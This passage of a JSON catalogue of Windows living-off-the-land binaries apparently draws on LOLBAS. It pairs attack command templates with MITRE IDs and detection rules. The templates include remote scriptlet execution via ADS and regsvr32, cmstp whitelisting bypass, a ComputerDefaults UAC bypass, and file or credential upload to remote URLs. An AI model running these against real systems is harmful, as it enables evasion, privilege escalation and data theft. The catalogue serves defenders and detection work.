measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:certutil-exe:6","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decodehex {PATH:.hex} {PATH}","description":"Command to decode a hexadecimal-encoded file.","usecase":"Decode files to evade defensive measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:change-exe:0","toolId":"lolbas:change-exe","toolName":"Change.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"change.exe user","description":"Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"change.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cipher-exe:0","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher /w:{PATH_ABSOLUTE:folder}","description":"Zero out a file","usecase":"Can be used to forensically erase a file.","mitre":["T1485"],"privilege":"user","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cipher-exe:1","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher.exe /e {PATH_ABSOLUTE}","description":"Encrypt a file","usecase":"Can be used to impair defences by e.g. encrypting a critical EDR solution file.","mitre":["T1562"],"privilege":"admin","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:0","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat","description":"Add content to an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:1","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe - < {PATH}:payload.bat","description":"Execute payload.bat stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1059.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:2","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"type {PATH_SMB} > {PATH_ABSOLUTE}","description":"Downloads a specified file from a WebDAV server to the target file.","usecase":"Download/copy a file from a WebDAV server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmd-exe:3","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"type {PATH_ABSOLUTE} > {PATH_SMB}","description":"Uploads a specified file to a WebDAV server.","usecase":"Upload a file to a WebDAV server","mitre":["T1048.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmdkey-exe:0","toolId":"lolbas:cmdkey-exe","toolName":"Cmdkey.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"cmdkey /list","description":"List cached credentials","usecase":"Get credential information from host","mitre":["T1078"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"}],"references":["https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey","https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmdl32-exe:0","toolId":"lolbas:cmdl32-exe","toolName":"cmdl32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmdl32 /vpn /lan %cd%\\config","description":"Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where \"X\" denotes a random number or letter.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %TMP%\\config.log"},{"type":"IOC","value":"Useragent Microsoft(R) Connection Manager Vpn File Update"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/151","https://twitter.com/ElliotKillick/status/1455897435063074824","https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/","https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmstp-exe:0","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}","description":"Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Download and run scriptlets from internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmstp-exe:1","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"cmstp.exe /ni /s {REMOTEURL:.inf}","description":"Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Execute code directly from Internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cmstp-exe:2","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /nf","description":"cmstp.exe reads the `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`.","usecase":"Proxy execution of a malicious DLL via registry modification.","mitre":["T1218.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:colorcpl-exe:0","toolId":"lolbas:colorcpl-exe","toolName":"Colorcpl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"colorcpl {PATH}","description":"Copies the referenced file to C:\\Windows\\System32\\spool\\drivers\\color\\.","usecase":"Copies file(s) to a subfolder of a generally trusted folder (c:\\Windows\\System32), which can be used to hide files or make them blend into the environment.","mitre":["T1036.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"},{"type":"IOC","value":"colorcpl.exe writing files"}],"references":["https://twitter.com/eral4m/status/1480468728324231172","https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:computerdefaults-exe:0","toolId":"lolbas:computerdefaults-exe","toolName":"ComputerDefaults.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ComputerDefaults.exe","description":"Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Event ID 10"},{"type":"IOC","value":"A binary or script spawned as a child process of ComputerDefaults.exe"},{"type":"IOC","value":"Changes to HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml"}],"references":["https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b","https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:configsecuritypolicy-exe:0","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:configsecuritypolicy-exe:1","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ConfigSecurityPolicy.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows 